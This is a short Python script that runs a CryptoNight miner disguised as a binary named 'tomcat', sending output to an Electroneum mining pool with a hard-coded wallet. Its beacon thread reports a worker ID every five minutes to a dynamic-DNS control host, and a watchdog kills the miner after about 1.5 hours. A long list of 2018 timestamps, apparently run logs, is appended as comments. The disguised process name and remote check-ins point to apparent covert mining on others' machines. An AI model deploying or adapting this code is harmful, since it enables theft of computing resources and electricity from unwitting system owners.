import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:38:07.330745
#2018-02-17 17:25:07.843986
#2018-02-17 19:16:05.809584
#2018-02-17 21:07:05.019930
#2018-02-17 22:51:05.399504
#2018-02-18 00:36:05.597453
#2018-02-18 02:26:07.388069
#2018-02-18 04:13:07.260303
#2018-02-18 06:05:03.810818
#2018-02-18 07:55:05.288164
#2018-02-18 09:42:06.146895
#2018-02-18 11:27:03.663332
#2018-02-18 13:14:01.450991
#2018-02-18 15:03:03.548401
#2018-02-18 16:51:04.773837
#2018-02-18 18:39:06.366856
#2018-02-18 20:27:01.861905
#2018-02-18 22:13:04.679287
#2018-02-19 00:02:06.552829
#2018-02-19 01:48:01.333013
#2018-02-19 03:35:03.719765
#2018-02-19 05:20:05.962532
#2018-02-19 07:07:03.885513
#2018-02-19 08:55:09.351252
#2018-02-19 10:44:01.641220
#2018-02-19 12:32:08.623696
#2018-02-19 14:21:08.729899
#2018-02-19 16:11:06.802693
#2018-02-19 17:58:08.586488
#2018-02-19 19:44:08.226843
#2018-02-19 21:31:01.500745
#2018-02-19 23:16:08.789165
#2018-02-20 01:02:05.963106
#2018-02-20 02:52:01.891640
#2018-02-20 04:39:06.556987
#2018-02-20 06:22:07.494420
#2018-02-20 08:07:08.094248
#2018-02-20 09:53:04.623562
#2018-02-20 11:36:08.116985
#2018-02-20 13:25:06.810173
#2018-02-20 15:09:07.016496
#2018-02-20 16:55:10.164068
#2018-02-20 18:44:10.607769
#2018-02-20 20:36:01.351379
#2018-02-20 22:22:07.839074
#2018-02-21 00:03:04.377099
#2018-02-21 01:49:05.915629
#2018-02-21 03:32:04.975646
#2018-02-21 05:21:04.194434
#2018-02-21 07:08:05.841378
#2018-02-21 08:54:07.912084
#2018-02-21 10:41:07.451605
#2018-02-21 12:28:07.857670
#2018-02-21 14:16:08.240612
#2018-02-21 16:03:04.437963
#2018-02-21 17:55:05.214657
#2018-02-21 19:40:09.133564
#2018-02-21 21:28:07.286527
#2018-02-21 23:14:07.874429
#2018-02-22 01:05:01.656629
#2018-02-22 02:52:03.712949
#2018-02-22 04:38:06.327523
#2018-02-22 06:23:04.745195
#2018-02-22 08:11:07.116353
#2018-02-22 09:58:01.755393
#2018-02-22 11:42:06.537291
#2018-02-22 13:27:07.953642
#2018-02-22 15:15:10.983491
#2018-02-22 17:02:01.471728
#2018-02-22 18:48:02.015867
#2018-02-22 20:39:01.704588
#2018-02-22 22:26:07.648333
#2018-02-23 00:12:01.384251
#2018-02-23 02:01:07.005568
#2018-02-23 03:49:03.940967
#2018-02-23 05:32:05.987638
#2018-02-23 07:18:05.286462
#2018-02-23 09:22:07.383861
#2018-02-23 11:27:05.650461
#2018-02-23 13:18:01.594852
#2018-02-23 15:04:06.963705
#2018-02-23 16:52:04.221167
#2018-02-23 18:39:07.130100
#2018-02-23 20:26:02.034247
#2018-02-23 22:13:06.174021
#2018-02-23 23:59:02.233007
#2018-02-24 01:48:08.499252
#2018-02-24 03:41:05.642488
#2018-02-24 05:24:05.311086
#2018-02-24 07:12:06.274825
#2018-02-24 09:01:04.559419
#2018-02-24 11:01:07.766163
#2018-02-24 12:49:07.094492
#2018-02-24 14:38:05.781137
#2018-02-24 16:27:01.578749
#2018-02-24 18:18:04.250324
#2018-02-24 20:05:02.490548
#2018-02-24 21:47:01.378490
#2018-02-25 00:46:07.952090
#2018-02-25 03:49:05.076618
#2018-02-25 06:36:04.527727
#2018-02-25 11:36:04.746576
#2018-02-25 13:24:01.427332
#2018-02-25 14:57:02.137548